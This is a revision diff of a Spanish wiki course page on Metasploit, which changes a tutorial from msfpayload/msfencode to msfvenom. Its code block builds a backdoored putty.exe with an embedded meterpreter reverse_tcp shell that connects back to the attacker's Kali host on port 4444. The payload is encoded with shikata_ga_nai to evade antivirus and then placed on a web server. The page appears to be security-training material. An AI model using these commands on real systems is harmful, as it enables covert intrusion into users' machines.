Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anterior Revisión previa Próxima revisión | Revisión previa | ||
sad:t2:m3 [2018/12/01 17:50] José Manuel Guallar |
sad:t2:m3 [2019/12/04 18:45] (actual) José Manuel Guallar |
||
---|---|---|---|
Línea 8: | Línea 8: | ||
Metasploit Framework es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, Metasploit se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos. | Metasploit Framework es una herramienta de penetración de código abierto que se utiliza para desarrollar y ejecutar código de exploits en una máquina de destino remota. En definitiva, Metasploit se puede usar para probar la vulnerabilidad de los sistemas informáticos con el fin de protegerlos y, por otro lado, también se puede usar para penetrar en sistemas remotos. | ||
- | ** ¿Qué es mfspayload?** | + | ** ¿Qué es msfvenom?** |
- | msfpayload es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación. | + | Es una instancia de línea de comandos de Metasploit que se utiliza para generar y generar todos los diversos tipos de código de shell que están disponibles en Metasploit. El uso más común de esta herramienta es para la generación de código de shell para una vulnerabilidad que no se encuentra actualmente en el Marco de Metasploit o para probar diferentes tipos de código de shell y opciones antes de finalizar un Módulo de explotación. Tambien modifica el codigo cualquier programa. |
- | + | ||
- | ** ¿Qué es msfencode?** | + | |
- | + | ||
- | msfencode es otra gran herramienta que el que modifica el codigo cualquier programa. | + | |
Línea 60: | Línea 56: | ||
<code> | <code> | ||
cp putty.exe /usr/share/metasploit-framework/data/templates/ | cp putty.exe /usr/share/metasploit-framework/data/templates/ | ||
- | msfpayload windows/meterpreter/reverse_tcp LHOST=<ip_del_kali> LPORT=4444 R | msfencode -t exe -x putty.exe -k -o bad_putty.exe -e x86/shikata_ga_nai -c 3 | + | msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ip_del_kali> LPORT=4444 -x putty.exe -e x86/shikata_ga_nai -i 3 -k -f exe > bad_putty.exe |
chmod 744 /var/www/bad_putty.exe | chmod 744 /var/www/bad_putty.exe | ||
ls -lrta | grep putty | ls -lrta | grep putty | ||
Línea 67: | Línea 63: | ||
El comando 1, ejecutables, como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode. | El comando 1, ejecutables, como putty.exe, debe copiarse en el directorio /templates/ para codificarlo con msfencode. | ||
- | El comando 2, crea una puerta trasera reverse_tcp usando msfpayload para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa msfencode para enlazar la puerta trasera en putty.exe. Se utilizan ce 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para evitar el antivirus de la máquina. | + | El comando 2, crea una puerta trasera reverse_tcp usando msfvenom para conectarse nuevamente a Kali (LHOST = ip_kali) por el puerto (LPORT = 4444). Se usa para enlazar la puerta trasera en putty.exe. Se utilizan 3 interacciones de codificación shikata_ga_nai (No hay mas remedio) para evitar el antivirus de la máquina. |
Comando 3, hace ejecutable bad_putty. | Comando 3, hace ejecutable bad_putty. | ||
| | ||
- | {{:sad:t2:m3:04.png?600|}} | + | {{:sad:t2:m3:4_1.png?600|}} |
<code> | <code> | ||
script msfconsole_putty.txt | script msfconsole_putty.txt |